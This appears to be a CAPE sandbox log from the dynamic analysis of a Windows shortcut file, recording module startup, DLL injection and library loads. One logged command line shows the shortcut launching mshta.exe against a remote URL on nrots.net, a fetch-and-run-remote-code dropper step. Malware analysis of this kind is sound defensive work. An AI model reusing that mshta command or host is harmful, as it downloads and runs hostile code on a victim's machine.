Analysis

Category Package Started Completed Duration Log
FILE lnk 2020-05-23 00:18:23 2020-05-23 00:24:05 342 seconds Show Log
2020-05-13 09:11:26,407 [root] INFO: Date set to: 20200523T00:10:54, timeout set to: 200
2020-05-23 00:10:54,046 [root] DEBUG: Starting analyzer from: C:\tmp52sk_on6
2020-05-23 00:10:54,046 [root] DEBUG: Storing results at: C:\winMkbbUJ
2020-05-23 00:10:54,046 [root] DEBUG: Pipe server name: \\.\PIPE\oUYoZgZ
2020-05-23 00:10:54,046 [root] DEBUG: Python path: C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32
2020-05-23 00:10:54,046 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-05-23 00:10:54,046 [root] INFO: Automatically selected analysis package "lnk"
2020-05-23 00:10:54,046 [root] DEBUG: Trying to import analysis package "lnk"...
2020-05-23 00:10:54,062 [root] DEBUG: Imported analysis package "lnk".
2020-05-23 00:10:54,062 [root] DEBUG: Trying to initialize analysis package "lnk"...
2020-05-23 00:10:54,062 [root] DEBUG: Initialized analysis package "lnk".
2020-05-23 00:10:54,093 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-05-23 00:10:54,093 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-05-23 00:10:54,093 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-05-23 00:10:54,109 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-05-23 00:10:54,109 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-05-23 00:10:54,125 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-05-23 00:10:54,125 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-05-23 00:10:54,140 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-05-23 00:10:54,140 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-05-23 00:10:54,140 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-05-23 00:10:54,140 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-05-23 00:10:54,156 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-05-23 00:10:54,156 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-05-23 00:10:54,156 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-05-23 00:10:54,156 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-05-23 00:10:54,156 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-05-23 00:10:54,156 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-05-23 00:10:54,156 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-05-23 00:10:54,156 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-05-23 00:10:54,171 [lib.api.screenshot] DEBUG: Importing 'math'
2020-05-23 00:10:54,171 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-05-23 00:10:54,296 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-05-23 00:10:54,312 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-05-23 00:10:54,359 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-05-23 00:10:54,359 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-05-23 00:10:54,359 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-05-23 00:10:54,359 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-05-23 00:10:54,359 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-05-23 00:10:54,375 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-05-23 00:10:54,375 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-05-23 00:10:54,375 [root] DEBUG: Initialized auxiliary module "Browser".
2020-05-23 00:10:54,375 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-05-23 00:10:54,375 [root] DEBUG: Started auxiliary module Browser
2020-05-23 00:10:54,375 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-05-23 00:10:54,375 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-05-23 00:10:54,375 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-05-23 00:10:54,390 [root] DEBUG: Started auxiliary module Curtain
2020-05-23 00:10:54,390 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-05-23 00:10:54,390 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-05-23 00:10:54,390 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-05-23 00:10:54,390 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-05-23 00:10:56,125 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2020-05-23 00:10:56,125 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-05-23 00:10:56,140 [root] DEBUG: Started auxiliary module DigiSig
2020-05-23 00:10:56,140 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-05-23 00:10:56,140 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-05-23 00:10:56,140 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-05-23 00:10:56,171 [root] DEBUG: Started auxiliary module Disguise
2020-05-23 00:10:56,171 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-05-23 00:10:56,171 [root] DEBUG: Initialized auxiliary module "Human".
2020-05-23 00:10:56,171 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-05-23 00:10:56,171 [root] DEBUG: Started auxiliary module Human
2020-05-23 00:10:56,171 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-05-23 00:10:56,187 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-05-23 00:10:56,187 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-05-23 00:10:56,187 [root] DEBUG: Started auxiliary module Procmon
2020-05-23 00:10:56,187 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-05-23 00:10:56,187 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-05-23 00:10:56,187 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-05-23 00:10:56,187 [root] DEBUG: Started auxiliary module Screenshots
2020-05-23 00:10:56,187 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-05-23 00:10:56,187 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-05-23 00:10:56,203 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-05-23 00:10:56,203 [root] DEBUG: Started auxiliary module Sysmon
2020-05-23 00:10:56,203 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-05-23 00:10:56,203 [root] DEBUG: Initialized auxiliary module "Usage".
2020-05-23 00:10:56,203 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-05-23 00:10:56,203 [root] DEBUG: Started auxiliary module Usage
2020-05-23 00:10:56,203 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a DLL option
2020-05-23 00:10:56,203 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a DLL_64 option
2020-05-23 00:10:56,203 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a loader option
2020-05-23 00:10:56,203 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a loader_64 option
2020-05-23 00:10:56,281 [lib.api.process] INFO: Successfully executed process from path "C:\Windows\system32\cmd.exe" with arguments "/c start /wait "" "C:\Users\Rebecca\AppData\Local\Temp\file.lnk"" with pid 5204
2020-05-23 00:10:56,281 [lib.api.process] INFO: Monitor config for process 5204: C:\tmp52sk_on6\dll\5204.ini
2020-05-23 00:10:56,296 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\bAkNCjYq.dll, loader C:\tmp52sk_on6\bin\KezQvek.exe
2020-05-23 00:10:56,390 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\oUYoZgZ.
2020-05-23 00:10:56,390 [root] DEBUG: Loader: Injecting process 5204 (thread 5608) with C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:10:56,390 [root] DEBUG: Process image base: 0x4A8F0000
2020-05-23 00:10:56,390 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:10:56,390 [root] DEBUG: InjectDllViaIAT: Failed to allocate region in target process for new import table.
2020-05-23 00:10:56,406 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-05-23 00:10:56,515 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-05-23 00:10:56,515 [root] DEBUG: Dropped file limit defaulting to 100.
2020-05-23 00:10:56,531 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 5204 at 0x6a130000, image base 0x4a8f0000, stack from 0xc3000-0x1c0000
2020-05-23 00:10:56,546 [root] DEBUG: Commandline: C:\Users\Rebecca\AppData\Local\Temp\"C:\Windows\system32\cmd.exe" \c start \wait "" "C:\Users\Rebecca\AppData\Local\Temp\file.lnk".
2020-05-23 00:10:56,562 [root] INFO: loaded: b'5204'
2020-05-23 00:10:56,562 [root] INFO: Loaded monitor into process with pid 5204
2020-05-23 00:10:56,562 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-05-23 00:10:56,562 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-05-23 00:10:56,562 [root] DEBUG: Successfully injected DLL C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:10:58,578 [lib.api.process] INFO: Successfully resumed process with pid 5204
2020-05-23 00:10:59,546 [root] DEBUG: DLL loaded at 0x76B60000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2020-05-23 00:10:59,546 [root] DEBUG: DLL loaded at 0x74620000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32 (0x19e000 bytes).
2020-05-23 00:10:59,546 [root] DEBUG: DLL loaded at 0x756F0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2020-05-23 00:10:59,562 [root] DEBUG: DLL loaded at 0x743C0000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2020-05-23 00:10:59,593 [root] DEBUG: DLL loaded at 0x76130000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2020-05-23 00:10:59,609 [root] DEBUG: DLL loaded at 0x744C0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2020-05-23 00:10:59,609 [root] DEBUG: DLL loaded at 0x75B60000: C:\Windows\system32\WLDAP32 (0x45000 bytes).
2020-05-23 00:10:59,718 [root] DEBUG: DLL loaded at 0x757A0000: C:\Windows\system32\profapi (0xb000 bytes).
2020-05-23 00:10:59,875 [root] DEBUG: DLL loaded at 0x756A0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-05-23 00:10:59,890 [root] DEBUG: DLL loaded at 0x6EB80000: C:\Windows\System32\shdocvw (0x2f000 bytes).
2020-05-23 00:10:59,968 [root] DEBUG: DLL loaded at 0x76530000: C:\Windows\system32\SETUPAPI (0x19d000 bytes).
2020-05-23 00:10:59,968 [root] DEBUG: DLL loaded at 0x75A00000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:10:59,968 [root] DEBUG: DLL loaded at 0x75840000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:10:59,984 [root] INFO: Disabling sleep skipping.
2020-05-23 00:11:00,000 [root] DEBUG: DLL unloaded from 0x76B60000.
2020-05-23 00:11:00,375 [root] DEBUG: DLL loaded at 0x70700000: C:\PROGRA~1\MICROS~3\Office14\GROOVEEX (0x406000 bytes).
2020-05-23 00:11:00,390 [root] DEBUG: DLL loaded at 0x70E20000: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCR90 (0xa3000 bytes).
2020-05-23 00:11:00,390 [root] DEBUG: DLL loaded at 0x70D60000: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCP90 (0x8e000 bytes).
2020-05-23 00:11:00,406 [root] DEBUG: DLL loaded at 0x70D30000: C:\Windows\WinSxS\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\ATL90 (0x2b000 bytes).
2020-05-23 00:11:00,406 [root] DEBUG: DLL loaded at 0x74290000: C:\Windows\system32\UxTheme (0x40000 bytes).
2020-05-23 00:11:00,421 [root] DEBUG: DLL loaded at 0x751C0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-05-23 00:11:00,421 [root] DEBUG: DLL loaded at 0x74F50000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-05-23 00:11:00,437 [root] DEBUG: DLL loaded at 0x70090000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,437 [root] DEBUG: DLL unloaded from 0x70090000.
2020-05-23 00:11:00,453 [root] DEBUG: DLL loaded at 0x70090000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,468 [root] DEBUG: DLL loaded at 0x6E950000: C:\Windows\system32\LINKINFO (0x9000 bytes).
2020-05-23 00:11:00,484 [root] DEBUG: DLL loaded at 0x70090000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,484 [root] DEBUG: DLL loaded at 0x70090000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,546 [root] DEBUG: DLL loaded at 0x761C0000: C:\Windows\system32\urlmon (0x124000 bytes).
2020-05-23 00:11:00,546 [root] DEBUG: DLL loaded at 0x75AC0000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:00,546 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:00,562 [root] DEBUG: DLL loaded at 0x75AD0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2020-05-23 00:11:00,562 [root] DEBUG: DLL loaded at 0x75870000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:00,562 [root] DEBUG: DLL loaded at 0x75830000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:00,578 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\version (0x9000 bytes).
2020-05-23 00:11:00,578 [root] DEBUG: DLL loaded at 0x75820000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2020-05-23 00:11:00,578 [root] DEBUG: DLL loaded at 0x77910000: C:\Windows\system32\normaliz (0x3000 bytes).
2020-05-23 00:11:00,578 [root] DEBUG: DLL loaded at 0x75E40000: C:\Windows\system32\iertutil (0x215000 bytes).
2020-05-23 00:11:00,640 [root] DEBUG: DLL loaded at 0x766D0000: C:\Windows\system32\WININET (0x1c4000 bytes).
2020-05-23 00:11:00,656 [root] DEBUG: DLL loaded at 0x75480000: C:\Windows\system32\Secur32 (0x8000 bytes).
2020-05-23 00:11:00,718 [root] DEBUG: DLL loaded at 0x71730000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:01,000 [root] INFO: Announced 32-bit process name: mshta.exe pid: 5952
2020-05-23 00:11:01,000 [lib.api.process] INFO: Monitor config for process 5952: C:\tmp52sk_on6\dll\5952.ini
2020-05-23 00:11:01,015 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\bAkNCjYq.dll, loader C:\tmp52sk_on6\bin\KezQvek.exe
2020-05-23 00:11:01,031 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\oUYoZgZ.
2020-05-23 00:11:01,031 [root] DEBUG: Loader: Injecting process 5952 (thread 5432) with C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:11:01,031 [root] DEBUG: Process image base: 0x00910000
2020-05-23 00:11:01,031 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:11:01,046 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-05-23 00:11:01,046 [root] DEBUG: Successfully injected DLL C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:11:01,046 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5952
2020-05-23 00:11:01,109 [root] INFO: Announced 32-bit process name: mshta.exe pid: 5952
2020-05-23 00:11:01,109 [lib.api.process] INFO: Monitor config for process 5952: C:\tmp52sk_on6\dll\5952.ini
2020-05-23 00:11:01,109 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\bAkNCjYq.dll, loader C:\tmp52sk_on6\bin\KezQvek.exe
2020-05-23 00:11:01,125 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\oUYoZgZ.
2020-05-23 00:11:01,125 [root] DEBUG: Loader: Injecting process 5952 (thread 5432) with C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:11:01,125 [root] DEBUG: Process image base: 0x00910000
2020-05-23 00:11:01,140 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:11:01,140 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-05-23 00:11:01,140 [root] DEBUG: Successfully injected DLL C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:11:01,140 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5952
2020-05-23 00:11:01,140 [root] DEBUG: DLL loaded at 0x6A370000: C:\Windows\system32\sfc (0x3000 bytes).
2020-05-23 00:11:01,140 [root] DEBUG: DLL loaded at 0x6A380000: C:\Windows\system32\sfc_os (0xd000 bytes).
2020-05-23 00:11:01,234 [root] DEBUG: DLL unloaded from 0x6A370000.
2020-05-23 00:11:01,249 [root] DEBUG: DLL unloaded from 0x70700000.
2020-05-23 00:11:01,265 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-05-23 00:11:01,265 [root] DEBUG: Dropped file limit defaulting to 100.
2020-05-23 00:11:01,281 [root] INFO: Disabling sleep skipping.
2020-05-23 00:11:01,281 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-05-23 00:11:01,281 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 5952 at 0x6a130000, image base 0x910000, stack from 0x2e6000-0x2f0000
2020-05-23 00:11:01,281 [root] DEBUG: DLL unloaded from 0x761C0000.
2020-05-23 00:11:01,296 [root] DEBUG: Commandline: C:\Windows\"C:\Windows\System32\msHta.Exe" http:\www.nrots.net\images\5328C28B\15936\11348\7c8d64e9\e17e25e.
2020-05-23 00:11:01,296 [root] INFO: loaded: b'5952'
2020-05-23 00:11:01,296 [root] INFO: Loaded monitor into process with pid 5952
2020-05-23 00:11:01,312 [root] DEBUG: DLL loaded at 0x756F0000: C:\Windows\System32\CRYPTBASE (0xc000 bytes).
2020-05-23 00:11:01,312 [root] DEBUG: DLL unloaded from 0x76B60000.
2020-05-23 00:11:01,312 [root] DEBUG: DLL unloaded from 0x6EB80000.
2020-05-23 00:11:03,062 [root] DEBUG: DLL loaded at 0x661E0000: C:\Windows\System32\mshtml (0x1062000 bytes).
2020-05-23 00:11:03,078 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:03,078 [root] DEBUG: DLL loaded at 0x75AC0000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:03,078 [root] DEBUG: DLL loaded at 0x761C0000: C:\Windows\system32\urlmon (0x124000 bytes).
2020-05-23 00:11:03,078 [root] DEBUG: DLL loaded at 0x766D0000: C:\Windows\system32\WININET (0x1c4000 bytes).
2020-05-23 00:11:03,109 [root] DEBUG: DLL loaded at 0x76130000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2020-05-23 00:11:03,109 [root] DEBUG: DLL loaded at 0x75CB0000: C:\Windows\system32\OLEAUT32 (0x91000 bytes).
2020-05-23 00:11:03,125 [root] DEBUG: DLL loaded at 0x74290000: C:\Windows\System32\UxTheme (0x40000 bytes).
2020-05-23 00:11:03,140 [root] DEBUG: DLL loaded at 0x74620000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32 (0x19e000 bytes).
2020-05-23 00:11:03,140 [root] DEBUG: DLL loaded at 0x75480000: C:\Windows\System32\Secur32 (0x8000 bytes).
2020-05-23 00:11:03,156 [root] DEBUG: DLL loaded at 0x6D9E0000: C:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:03,171 [root] DEBUG: DLL loaded at 0x76B60000: C:\Windows\system32\shell32 (0xc4c000 bytes).
2020-05-23 00:11:03,187 [root] DEBUG: DLL loaded at 0x757A0000: C:\Windows\System32\profapi (0xb000 bytes).
2020-05-23 00:11:03,187 [root] DEBUG: DLL loaded at 0x71730000: C:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:03,218 [root] DEBUG: DLL loaded at 0x75D50000: C:\Windows\system32\WS2_32 (0x35000 bytes).
2020-05-23 00:11:03,218 [root] DEBUG: DLL loaded at 0x779C0000: C:\Windows\system32\NSI (0x6000 bytes).
2020-05-23 00:11:03,234 [root] DEBUG: DLL loaded at 0x6F380000: C:\Windows\system32\winhttp (0x58000 bytes).
2020-05-23 00:11:03,234 [root] DEBUG: DLL loaded at 0x6F330000: C:\Windows\system32\webio (0x50000 bytes).
2020-05-23 00:11:03,234 [root] DEBUG: DLL unloaded from 0x6F380000.
2020-05-23 00:11:03,249 [root] DEBUG: DLL loaded at 0x75180000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-05-23 00:11:03,249 [root] DEBUG: DLL loaded at 0x73C60000: C:\Windows\System32\IPHLPAPI (0x1c000 bytes).
2020-05-23 00:11:03,249 [root] DEBUG: DLL loaded at 0x73B10000: C:\Windows\System32\WINNSI (0x7000 bytes).
2020-05-23 00:11:03,249 [root] DEBUG: DLL loaded at 0x75170000: C:\Windows\System32\wship6 (0x6000 bytes).
2020-05-23 00:11:03,343 [root] DEBUG: DLL loaded at 0x75040000: C:\Windows\System32\DNSAPI (0x44000 bytes).
2020-05-23 00:11:03,343 [root] DEBUG: DLL loaded at 0x739F0000: C:\Windows\System32\dhcpcsvc6 (0xd000 bytes).
2020-05-23 00:11:03,343 [root] DEBUG: DLL loaded at 0x70CC0000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-05-23 00:11:03,359 [root] DEBUG: DLL loaded at 0x73F00000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-05-23 00:11:03,359 [root] DEBUG: DLL loaded at 0x73970000: C:\Windows\System32\dhcpcsvc (0x12000 bytes).
2020-05-23 00:11:03,359 [root] DEBUG: DLL loaded at 0x74D00000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-05-23 00:11:03,375 [root] DEBUG: DLL loaded at 0x6BF80000: C:\Windows\System32\ieframe (0xaba000 bytes).
2020-05-23 00:11:03,375 [root] DEBUG: DLL loaded at 0x6BF70000: C:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:03,375 [root] DEBUG: DLL loaded at 0x71EA0000: C:\Windows\System32\rasadhlp (0x6000 bytes).
2020-05-23 00:11:03,390 [root] DEBUG: DLL loaded at 0x751C0000: C:\Windows\System32\CRYPTSP (0x17000 bytes).
2020-05-23 00:11:03,390 [root] DEBUG: DLL loaded at 0x73440000: C:\Windows\system32\msimtf (0xb000 bytes).
2020-05-23 00:11:03,390 [root] DEBUG: DLL loaded at 0x74F50000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-05-23 00:11:03,406 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\System32\RpcRtRemote (0xe000 bytes).
2020-05-23 00:11:03,406 [root] DEBUG: DLL loaded at 0x6B3F0000: C:\Windows\System32\OLEACC (0x3c000 bytes).
2020-05-23 00:11:03,421 [root] DEBUG: DLL loaded at 0x75700000: C:\Windows\System32\SXS (0x5f000 bytes).
2020-05-23 00:11:03,421 [root] DEBUG: DLL loaded at 0x6DF50000: C:\Windows\System32\npmproxy (0x8000 bytes).
2020-05-23 00:11:17,671 [root] DEBUG: DLL loaded at 0x6DF10000: C:\Windows\System32\msls31 (0x31000 bytes).
2020-05-23 00:11:17,687 [root] DEBUG: DLL loaded at 0x68340000: C:\Windows\System32\d2d1 (0x347000 bytes).
2020-05-23 00:11:17,703 [root] DEBUG: DLL loaded at 0x68C70000: C:\Windows\System32\DWrite (0x136000 bytes).
2020-05-23 00:11:17,703 [root] DEBUG: DLL loaded at 0x71750000: C:\Windows\System32\dxgi (0x4c000 bytes).
2020-05-23 00:11:17,718 [root] DEBUG: DLL loaded at 0x73DB0000: C:\Windows\System32\dwmapi (0x13000 bytes).
2020-05-23 00:11:17,718 [root] DEBUG: DLL loaded at 0x76530000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:17,734 [root] DEBUG: DLL loaded at 0x75A00000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:17,734 [root] DEBUG: DLL loaded at 0x75840000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:17,734 [root] DEBUG: DLL loaded at 0x75AE0000: C:\Windows\system32\WINTRUST (0x2f000 bytes).
2020-05-23 00:11:17,750 [root] DEBUG: DLL loaded at 0x758D0000: C:\Windows\system32\CRYPT32 (0x122000 bytes).
2020-05-23 00:11:17,750 [root] DEBUG: DLL loaded at 0x75810000: C:\Windows\system32\MSASN1 (0xc000 bytes).
2020-05-23 00:11:17,750 [root] DEBUG: DLL unloaded from 0x76530000.
2020-05-23 00:11:17,781 [root] DEBUG: DLL loaded at 0x76530000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:17,781 [root] DEBUG: DLL loaded at 0x75A00000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:17,781 [root] DEBUG: DLL loaded at 0x75840000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:17,796 [root] DEBUG: DLL unloaded from 0x75B10000.
2020-05-23 00:11:17,796 [root] DEBUG: DLL loaded at 0x71590000: C:\Windows\System32\d3d11 (0x175000 bytes).
2020-05-23 00:11:17,828 [root] DEBUG: DLL loaded at 0x68150000: C:\Windows\System32\D3D10Warp (0x1ea000 bytes).
2020-05-23 00:11:17,828 [root] DEBUG: DLL loaded at 0x76530000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:17,843 [root] DEBUG: DLL loaded at 0x75A00000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:17,843 [root] DEBUG: DLL loaded at 0x75840000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:17,843 [root] DEBUG: DLL unloaded from 0x76530000.
2020-05-23 00:11:17,875 [root] DEBUG: DLL loaded at 0x76530000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:17,875 [root] DEBUG: DLL loaded at 0x75A00000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:17,875 [root] DEBUG: DLL loaded at 0x75840000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:17,890 [root] DEBUG: DLL unloaded from 0x75B10000.
2020-05-23 00:11:17,890 [root] DEBUG: DLL unloaded from 0x68150000.
2020-05-23 00:11:53,406 [root] DEBUG: DLL unloaded from 0x762F0000.
2020-05-23 00:14:18,687 [root] INFO: Analysis timeout hit, terminating analysis.
2020-05-23 00:14:18,687 [lib.api.process] INFO: Terminate event set for process 5204
2020-05-23 00:14:18,703 [root] DEBUG: Terminate Event: Attempting to dump process 5204
2020-05-23 00:14:18,734 [root] INFO: b'C:\\winMkbbUJ\\CAPE\\5204_124369281818142222552020|5204|0;?C:\\Windows\\System32\\cmd.exe;?C:\\Windows\\System32\\cmd.exe;?'
2020-05-23 00:14:18,734 [root] INFO: cape
2020-05-23 00:14:18,734 [root] INFO: ('dump_file', 'C:\\winMkbbUJ\\CAPE\\5204_124369281818142222552020', b'0;?C:\\Windows\\System32\\cmd.exe;?C:\\Windows\\System32\\cmd.exe;?', ['5204'], 'procdump')
2020-05-23 00:14:18,765 [root] INFO: ('dump_file', 'C:\\winMkbbUJ\\CAPE\\5204_124369281818142222552020', '', False, 'files')
2020-05-23 00:14:18,781 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x49e00.
2020-05-23 00:14:18,781 [lib.api.process] INFO: Termination confirmed for process 5204
2020-05-23 00:14:18,781 [root] INFO: Terminate event set for process 5204.
